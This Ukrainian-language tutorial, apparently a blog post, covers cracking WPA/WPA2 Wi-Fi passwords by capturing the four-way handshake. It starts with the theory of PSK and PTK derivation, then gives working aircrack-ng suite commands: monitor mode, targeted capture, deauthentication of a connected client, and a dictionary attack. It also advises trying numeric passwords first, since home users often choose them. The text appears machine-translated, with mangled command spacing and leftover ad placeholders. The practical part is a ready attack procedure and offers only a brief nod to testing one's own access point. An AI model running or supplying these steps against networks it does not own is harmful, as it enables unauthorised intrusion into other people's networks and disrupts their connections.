Злом Wi-Fi мережі WPA / WPA2 - перехоплення handshake - частина 1

  1. Теорія WPA / WPA2
  2. Практика

У цій статті мова піде про те, як зламати Wi-Fi мережу з шифруванням WPA / WPA2 шляхом перехоплення handshake. Але для початку теорія.

Але для початку теорія

Теорія WPA / WPA2

WPA (або як іноді називають WPA v1) зазвичай використовує алгоритм шифрування TKIP. TKIP був розроблений для підвищення шифрування WEP, який не потребує зміни заліза для роботи. WPA2 в обов'язковому порядку використовує алгоритм шифрування AES-CCMP, який більш потужний і надійний в порівнянні з TKIP.

WPA і WPA2 дозволяють використовувати або EAS-bases аутентифікацію (RADIUS Server "Enterprise") або Pre-Shared Key (PSK) "Personal" -based аутентифікацію.

Шифрування WPA / WPA2 PSK уразливі до атак за словником. Для здійснення цієї атаки, необхідно отримати 4-way WPA handshake між wifi-клієнтом і точкою доступу (АР), а також словник містить парольний фразу.

WPA / WPA2 PSK працює наступним чином: він випливає з ключа попередньої сесії, яка називається Pairwise Transient Key (PTK). PTK, в свою чергу використовує Pre-Shared Key і п'ять інших параметрів - SSID, Authenticator Nounce (ANounce), Supplicant Nounce (SNounce), Authenticator MAC-address (MAC-адресу точки доступу) і Suppliant MAC-address (МАС-адреса wifi -клієнт). Цей ключ надалі використовує шифрування між точкою доступу (АР) і wifi-клієнтом.

Зловмисник, який у цей момент часу прослуховує ефір, може перехопити всі п'ять параметрів (див. Попередній параграф). Єдиною річчю, яку не володіє лиходій це - Pre-Shared key. Давайте з'ясуємо, як створюється Pre-Shared key.

Pre-Shared key виходить / створюється завдяки використанню парольної фрази WPA-PSK, яку відправляє користувач, разом з SSID. Комбінація цих двох параметрів пересилається через Password Based Key Derivation Function (PBKDF2), яка виводить 256-bit'овий загальний ключ.

Комбінація цих двох параметрів пересилається через Password Based Key Derivation Function (PBKDF2), яка виводить 256-bit'овий загальний ключ

У звичайній / типовою WPA / WPA2 PSK атаці по словнику, зловмисник буде використовувати словник з програмою / інструментом. Програма буде виводити 256-bit'овий Pre-Shared Key для кожної парольної фрази і буде використовувати її з іншими параметрами, які були описані в створенні PTK. PTK буде використовуватися для перевірки Message Integrity Check (MIC) в одному з пакетів handshake. Якщо вони співпадуть, то парольний фраза в словнику буде вірною, в іншому випадку навпаки (невірної). Саме так працює WPA / WPA2 PSK.

Практика

Важливо: Не забуваємо про те, що потрібно вибрати правильний wifi-клієнт! Для цього уважно дивимося піти підтримуваних чіпсетів . Як клієнт я використовую ALFA AWUS036H.

[Ad name = "Alfa»]

Після того як куплено / вибрано "правильне" залізо, приступаємо до його налаштуванні. Для початку виконаємо команду airmon-ng, щоб дізнатися які інтерфейси є в системі:

У мене ALFA визначається, як інтерфейс wlan2. Переводимо wifi-клієнта в режим монітора:

$ Sudo airmon - ng start wlan2

Створився віртуальний інтерфейс mon0, з ним ми і будемо працювати.

Тепер скануємо ефір за допомогою airodump-ng:

Так як ми всі "хороші", будемо тестувати все на наших АР. У моєму випадку це TestWireless. Перемикається на неї:

$ Sudo airodump - ng - w handshaketest - c 1 - bssid BC: AE: C5: 71: D3: 17 mon0

  • -w - назва дамп-файлу
  • -c - номер каналу
  • -Bssid - MAC-адресу точки доступу

Бачимо, що до АР підключений клієнт. Це те, що нам потрібно, тому знаємо - перехоплення handshake можливий тоді і тільки тоді, коли до АР підключений клієнт.

Тепер залишаємо вікно терміналу де працює airodump-ng відкритим. Відкриваємо нове вікно, в якому пишемо:

$ Sudo aireplay - ng - 0 3 - a BC: AE: C5: 71: D3: 17 - c 70: F1: A1: 72: b4: 25 mon0

  • -0 - деаутентіфікація
  • 3 - кількість пакетів
  • -a - MAC-адресу точки доступу (АР)
  • -c - MAC-адресу клієнта, до якого застосовується деаутентіфікація

[Ad name = "MiBand2"]

Коли команда виконалася, переходимо в перше вікно терміналу (airodump-ng). Червоним виділено перехоплений handshake. У вас повинно бути те ж саме.

Все, тепер можна працювати з aircrack-ng.

Для того, щоб розшифрувати handshake нам потрібен буде словник. Пам'ятаємо про те, що якщо пароля в словнику не буде, то і розшифрувати не вийде. Дуже часто "домашні" користувачі ставлять чисельні паролі. Так що починайте з них.

Отже, словник створили або завантажили. Тепер приступаємо до розшифровки. Але спочатку ще раз перевіримо, перехопили ми handshake. Для цього вводимо слід. команду:

$ Sudo aircrack - ng handshaketest - 01.cap

Все ОК. Тепер приступаємо до розшифровки. Виконаємо команду, нижче:

$ Sudo aircrack - ng - w pass .txt - 0 handshaketest - 01.cap

  • -w - шлях до словника
  • -0 - використовувати колір

От і все. Як завжди нічого складного!

Інші матеріали по темі:

[Всього голосів: 129 Середній: 3.3 / 5]

Вам може бути цікаво також: